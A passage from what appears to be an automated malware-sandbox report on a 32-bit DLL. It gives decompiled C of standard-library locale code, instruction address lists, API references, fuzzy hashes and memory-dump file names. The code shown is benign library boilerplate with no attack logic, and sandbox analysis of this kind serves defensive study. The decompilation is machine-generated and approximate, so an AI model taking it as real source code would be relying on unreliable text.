																										} else {
																											_t929 = _t952;
																											goto L54;
																										}
																									}
																								} else {
																									_t928 =  *(_t990 - 0x10);
																									 *(_t990 - 0x10) = _t928;
																									 *(_t990 - 4) = 1;
																									E6E206FD3(__eflags, _t928);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t928 + 4))))();
																									 *0x6e2c6dec = _t928;
																									goto L47;
																								}
																							} else {
																								_t928 = _t951;
																								goto L47;
																							}
																						}
																					} else {
																						_t927 =  *(_t990 - 0x10);
																						 *(_t990 - 0x10) = _t927;
																						 *(_t990 - 4) = 1;
																						E6E206FD3(__eflags, _t927);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t927 + 4))))();
																						 *0x6e2c6db8 = _t927;
																						goto L40;
																					}
																				} else {
																					_t927 = _t950;
																					goto L40;
																				}
																			}
																		} else {
																			_t926 =  *(_t990 - 0x10);
																			 *(_t990 - 0x10) = _t926;
																			 *(_t990 - 4) = 1;
																			E6E206FD3(__eflags, _t926);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t926 + 4))))();
																			 *0x6e2c6de8 = _t926;
																			goto L33;
																		}
																	} else {
																		_t926 = _t949;
																		goto L33;
																	}
																}
															} else {
																_t925 =  *(_t990 - 0x10);
																 *(_t990 - 0x10) = _t925;
																 *(_t990 - 4) = 1;
																E6E206FD3(__eflags, _t925);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t925 + 4))))();
																 *0x6e2c6dd4 = _t925;
																goto L26;
															}
														} else {
															_t925 = _t948;
															goto L26;
														}
													}
												} else {
													_t924 =  *(_t990 - 0x10);
													 *(_t990 - 0x10) = _t924;
													 *(_t990 - 4) = 1;
													E6E206FD3(__eflags, _t924);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t924 + 4))))();
													 *0x6e2c6db4 = _t924;
													goto L19;
												}
											} else {
												_t924 = _t947;
												goto L19;
											}
										}
									} else {
										_t923 =  *(_t990 - 0x10);
										 *(_t990 - 0x10) = _t923;
										 *(_t990 - 4) = 1;
										E6E206FD3(__eflags, _t923);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t923 + 4))))();
										 *0x6e2c6de4 = _t923;
										goto L12;
									}
								} else {
									_t923 = _t946;
									goto L12;
								}
							}
						} else {
							_t922 =  *(_t990 - 0x10);
							 *(_t990 - 0x10) = _t922;
							 *(_t990 - 4) = 1;
							E6E206FD3(__eflags, _t922);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t922 + 4))))();
							 *0x6e2c6e04 = _t922;
							goto L5;
						}
					} else {
						_t922 = _t945;
						goto L5;
					}
				}
			}

0x6e20eeeb
0x6e20eeeb
0x6e20eef2
0x6e20eefc
0x6e20ef01
0x6e20ef0c
0x6e20ef10
0x6e20ef13
0x6e20ef18
0x6e20ef1c
0x6e20ef21
0x6e20ef25
0x6e20ef6a
0x6e20ef6d
0x6e20ef79
0x6e20ef27
0x6e20ef29
0x6e20ef2f
0x6e20ef35
0x6e20ef3d
0x6e20ef40
0x6e20ef7d
0x6e20ef8b
0x6e20ef90
0x6e20ef98
0x6e20efa2
0x6e20efa7
0x6e20efb2
0x6e20efb6
0x6e20efb9
0x6e20efbe
0x6e20efc7
0x6e20efc9
0x6e20efcb
0x6e20f010
0x6e20f013
0x6e20f01f
0x6e20efcd
0x6e20efcd
0x6e20efcf
0x6e20efd5
0x6e20efdb
0x6e20efe3
0x6e20efe6
0x6e20f023
0x6e20f031
0x6e20f036
0x6e20f03e
0x6e20f048
0x6e20f04d
0x6e20f058
0x6e20f05c
0x6e20f05f
0x6e20f064
0x6e20f06d
0x6e20f06f
0x6e20f071
0x6e20f0b6
0x6e20f0b9
0x6e20f0c5
0x6e20f073
0x6e20f073
0x6e20f075
0x6e20f07b
0x6e20f081
0x6e20f089
0x6e20f08c
0x6e20f0c9
0x6e20f0d7
0x6e20f0dc
0x6e20f0e4
0x6e20f0ee
0x6e20f0f3
0x6e20f0fe
0x6e20f102
0x6e20f105
0x6e20f10a
0x6e20f113
0x6e20f115
0x6e20f117
0x6e20f15c
0x6e20f15f
0x6e20f16b
0x6e20f119
0x6e20f119
0x6e20f11b
0x6e20f121
0x6e20f127
0x6e20f12f
0x6e20f132
0x6e20f16f
0x6e20f17d
0x6e20f182
0x6e20f18a
0x6e20f194
0x6e20f199
0x6e20f1a4
0x6e20f1a8
0x6e20f1ab
0x6e20f1b0
0x6e20f1b9
0x6e20f1bb
0x6e20f1bd
0x6e20f202
0x6e20f205
0x6e20f211
0x6e20f1bf
0x6e20f1bf
0x6e20f1c1
0x6e20f1c7
0x6e20f1cd
0x6e20f1d5
0x6e20f1d8
0x6e20f215
0x6e20f223
0x6e20f228
0x6e20f230
0x6e20f23a
0x6e20f23f
0x6e20f24a
0x6e20f24e
0x6e20f251
0x6e20f256
0x6e20f25f
0x6e20f261
0x6e20f263
0x6e20f2a8
0x6e20f2ab
0x6e20f2b7
0x6e20f265
0x6e20f265
0x6e20f267
0x6e20f26d
0x6e20f273
0x6e20f27b
0x6e20f27e
0x6e20f2bb
0x6e20f2c9
0x6e20f2ce
0x6e20f2d6
0x6e20f2e0
0x6e20f2e5
0x6e20f2f0
0x6e20f2f4
0x6e20f2f7
0x6e20f2fc
0x6e20f305
0x6e20f307
0x6e20f309
0x6e20f34e
0x6e20f351
0x6e20f35d
0x6e20f30b
0x6e20f30b
0x6e20f30d
0x6e20f313
0x6e20f319
0x6e20f321
0x6e20f324
0x6e20f361
0x6e20f36f
0x6e20f374
0x6e20f37c
0x6e20f386
0x6e20f38b
0x6e20f396
0x6e20f39a
0x6e20f39d
0x6e20f3a2
0x6e20f3ab
0x6e20f3ad
0x6e20f3af
0x6e20f3f4
0x6e20f3f7
0x6e20f403
0x6e20f3b1
0x6e20f3b1
0x6e20f3b3
0x6e20f3b9
0x6e20f3bf
0x6e20f3c7
0x6e20f3ca
0x6e20f407
0x6e20f415
0x6e20f41a
0x6e20f422
0x6e20f42c
0x6e20f431
0x6e20f43c
0x6e20f440
0x6e20f443
0x6e20f448
0x6e20f451
0x6e20f453
0x6e20f455
0x6e20f49a
0x6e20f49d
0x6e20f4a9
0x6e20f457
0x6e20f457
0x6e20f459
0x6e20f45f
0x6e20f465
0x6e20f46d
0x6e20f470
0x6e20f4ad
0x6e20f4bb
0x6e20f4c0
0x6e20f4c8
0x6e20f4d2
0x6e20f4d7
0x6e20f4e2
0x6e20f4e6
0x6e20f4e9
0x6e20f4ee
0x6e20f4f7
0x6e20f4f9
0x6e20f4fb
0x6e20f540
0x6e20f543
0x6e20f54f
0x6e20f4fd
0x6e20f4fd
0x6e20f4ff
0x6e20f505
0x6e20f50b
0x6e20f513
0x6e20f516
0x6e20f553
0x6e20f561
0x6e20f566
0x6e20f56e
0x6e20f578
0x6e20f57d
0x6e20f588
0x6e20f58c
0x6e20f58f
0x6e20f594
0x6e20f59d
0x6e20f59f
0x6e20f5a1
0x6e20f5e6
0x6e20f5e9
0x6e20f5f5
0x6e20f5a3
0x6e20f5a3
0x6e20f5a5
0x6e20f5ab
0x6e20f5b1
0x6e20f5b9
0x6e20f5bc
0x6e20f5f9
0x6e20f607
0x6e20f60c
0x6e20f614
0x6e20f61e
0x6e20f623
0x6e20f62e
0x6e20f632
0x6e20f635
0x6e20f63a
0x6e20f643
0x6e20f645
0x6e20f647
0x6e20f68c
0x6e20f68f
0x6e20f69b
0x6e20f649
0x6e20f649
0x6e20f64b
0x6e20f651
0x6e20f657
0x6e20f65f
0x6e20f662
0x6e20f69f
0x6e20f6ad
0x6e20f6b2
0x6e20f6ba
0x6e20f6c4
0x6e20f6c9
0x6e20f6d4
0x6e20f6d8
0x6e20f6db
0x6e20f6e0
0x6e20f6e9
0x6e20f6eb
0x6e20f6ed
0x6e20f732
0x6e20f735
0x6e20f741
0x6e20f6ef
0x6e20f6ef
0x6e20f6f1
0x6e20f6f7
0x6e20f6fd
0x6e20f705
0x6e20f708
0x6e20f745
0x6e20f753
0x6e20f758
0x6e20f760
0x6e20f76a
0x6e20f76f
0x6e20f77a
0x6e20f77e
0x6e20f781
0x6e20f786
0x6e20f78f
0x6e20f791
0x6e20f793
0x6e20f7d8
0x6e20f7db
0x6e20f7e7
0x6e20f795
0x6e20f795
0x6e20f797
0x6e20f79d
0x6e20f7a3
0x6e20f7ab
0x6e20f7ae
0x6e20f7eb
0x6e20f7f9
0x6e20f7fe
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f835
0x6e20f837
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797
0x6e20f70a
0x6e20f70a
0x6e20f70d
0x6e20f711
0x6e20f715
0x6e20f722
0x6e20f72a
0x6e20f72c
0x00000000
0x6e20f72c
0x6e20f6f3
0x6e20f6f3
0x00000000
0x6e20f6f3
0x6e20f6f1
0x6e20f664
0x6e20f664
0x6e20f667
0x6e20f66b
0x6e20f66f
0x6e20f67c
0x6e20f684
0x6e20f686
0x00000000
0x6e20f686
0x6e20f64d
0x6e20f64d
0x00000000
0x6e20f64d
0x6e20f64b
0x6e20f5be
0x6e20f5be
0x6e20f5c1
0x6e20f5c5
0x6e20f5c9
0x6e20f5d6
0x6e20f5de
0x6e20f5e0
0x00000000
0x6e20f5e0
0x6e20f5a7
0x6e20f5a7
0x00000000
0x6e20f5a7
0x6e20f5a5
0x6e20f518
0x6e20f518
0x6e20f51b
0x6e20f51f
0x6e20f523
0x6e20f530
0x6e20f538
0x6e20f53a
0x00000000
0x6e20f53a
0x6e20f501
0x6e20f501
0x00000000
0x6e20f501
0x6e20f4ff
0x6e20f472
0x6e20f472
0x6e20f475
0x6e20f479
0x6e20f47d
0x6e20f48a
0x6e20f492
0x6e20f494
0x00000000
0x6e20f494
0x6e20f45b
0x6e20f45b
0x00000000
0x6e20f45b
0x6e20f459
0x6e20f3cc
0x6e20f3cc
0x6e20f3cf
0x6e20f3d3
0x6e20f3d7
0x6e20f3e4
0x6e20f3ec
0x6e20f3ee
0x00000000
0x6e20f3ee
0x6e20f3b5
0x6e20f3b5
0x00000000
0x6e20f3b5
0x6e20f3b3
0x6e20f326
0x6e20f326
0x6e20f329
0x6e20f32d
0x6e20f331
0x6e20f33e
0x6e20f346
0x6e20f348
0x00000000
0x6e20f348
0x6e20f30f
0x6e20f30f
0x00000000
0x6e20f30f
0x6e20f30d
0x6e20f280
0x6e20f280
0x6e20f283
0x6e20f287
0x6e20f28b
0x6e20f298
0x6e20f2a0
0x6e20f2a2
0x00000000
0x6e20f2a2
0x6e20f269
0x6e20f269
0x00000000
0x6e20f269
0x6e20f267
0x6e20f1da
0x6e20f1da
0x6e20f1dd
0x6e20f1e1
0x6e20f1e5
0x6e20f1f2
0x6e20f1fa
0x6e20f1fc
0x00000000
0x6e20f1fc
0x6e20f1c3
0x6e20f1c3
0x00000000
0x6e20f1c3
0x6e20f1c1
0x6e20f134
0x6e20f134
0x6e20f137
0x6e20f13b
0x6e20f13f
0x6e20f14c
0x6e20f154
0x6e20f156
0x00000000
0x6e20f156
0x6e20f11d
0x6e20f11d
0x00000000
0x6e20f11d
0x6e20f11b
0x6e20f08e
0x6e20f08e
0x6e20f091
0x6e20f095
0x6e20f099
0x6e20f0a6
0x6e20f0ae
0x6e20f0b0
0x00000000
0x6e20f0b0
0x6e20f077
0x6e20f077
0x00000000
0x6e20f077
0x6e20f075
0x6e20efe8
0x6e20efe8
0x6e20efeb
0x6e20efef
0x6e20eff3
0x6e20f000
0x6e20f008
0x6e20f00a
0x00000000
0x6e20f00a
0x6e20efd1
0x6e20efd1
0x00000000
0x6e20efd1
0x6e20efcf
0x6e20ef42
0x6e20ef42
0x6e20ef45
0x6e20ef49
0x6e20ef4d
0x6e20ef5a
0x6e20ef62
0x6e20ef64
0x00000000
0x6e20ef64
0x6e20ef2b
0x6e20ef2b
0x00000000
0x6e20ef2b
0x6e20ef29

APIs

__EH_prolog3.LIBCMT ref: 6E20EEF2
std::_Lockit::_Lockit.LIBCPMT ref: 6E20EEFC
int.LIBCPMT ref: 6E20EF13

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

codecvt.LIBCPMT ref: 6E20EF36
std::_Facet_Register.LIBCPMT ref: 6E20EF4D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20EF6D
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20EF8B

Strings

0k,n, xrefs: 6E20EF07

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: 0k,n
API String ID: 2594415655-114697357
Opcode ID: 8b756e5784a4f5490271d43bef1c0ecc3b16846255bc20116ac77fd3c7765d7a
Instruction ID: 5986fe8daf7e90926c789368786eb62b9e312487daab31bd92e13b7db7bf81cc
Opcode Fuzzy Hash: 8b756e5784a4f5490271d43bef1c0ecc3b16846255bc20116ac77fd3c7765d7a
Instruction Fuzzy Hash: 9C11E375A1091ECBCF00EBE0C898AEDB77BAF44714F140909E4107B2D0DBB49E80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20F6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t462 - 0x14, 0);
				_t441 =  *0x6e2c6dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6E1E161C(0x6e2c6d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6E2066BA(_t462 - 0x14);
					return E6E220075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6E211230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t462 - 0x20);
							E6E223D74(_t462 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t430, _t441, 0x14);
							E6E206653(_t462 - 0x14, 0);
							_t442 =  *0x6e2c6dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6E1E161C(0x6e2c6d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6E2066BA(_t462 - 0x14);
								return E6E220075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6E2112B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t462 - 0x20);
										E6E223D74(_t462 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t327, _t431, _t442, 0x14);
										E6E206653(_t462 - 0x14, 0);
										_t443 =  *0x6e2c6dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6E1E161C(0x6e2c6d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6E2066BA(_t462 - 0x14);
											return E6E220075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6E211339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t462 - 0x20);
													E6E223D74(_t462 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t327, _t432, _t443, 0x14);
													E6E206653(_t462 - 0x14, 0);
													_t444 =  *0x6e2c6db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6E1E161C(0x6e2c6d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6E2066BA(_t462 - 0x14);
														return E6E220075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6E2113A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t462 - 0x20);
																E6E223D74(_t462 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t327, _t433, _t444, 0x14);
																E6E206653(_t462 - 0x14, 0);
																_t445 =  *0x6e2c6ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6E1E161C(0x6e2c6d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6E2066BA(_t462 - 0x14);
																	return E6E220075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6E211409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t462 - 0x20);
																			E6E223D74(_t462 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t327, _t434, _t445, 0x14);
																			E6E206653(_t462 - 0x14, 0);
																			_t446 =  *0x6e2c6de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6E1E161C(0x6e2c6d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6E2066BA(_t462 - 0x14);
																				return E6E220075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6E211471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t462 - 0x20);
																						E6E223D74(_t462 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t327, _t435, _t446, 0x14);
																						E6E206653(_t462 - 0x14, 0);
																						_t447 =  *0x6e2c6dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6E1E161C(0x6e2c6da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6E2066BA(_t462 - 0x14);
																							return E6E220075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6E2114EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t462 - 0x20);
																									E6E223D74(_t462 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t327, _t436, _t447, 0x14);
																									E6E206653(_t462 - 0x14, 0);
																									_t448 =  *0x6e2c6dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6E1E161C(0x6e2c6d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6E2066BA(_t462 - 0x14);
																										return E6E220075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6E211558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t462 - 0x20);
																												E6E223D74(_t462 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t327, _t437, _t448, 0x14);
																												E6E206653(_t462 - 0x14, 0);
																												_t449 =  *0x6e2c6e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6E1E161C(0x6e2c6dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6E2066BA(_t462 - 0x14);
																													return E6E220075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6E2115C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t462 - 0x20);
																															E6E223D74(_t462 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t327, _t438, _t449, 0x14);
																															E6E206653(_t462 - 0x14, 0);
																															_t450 =  *0x6e2c6dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6E1E161C(0x6e2c6d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
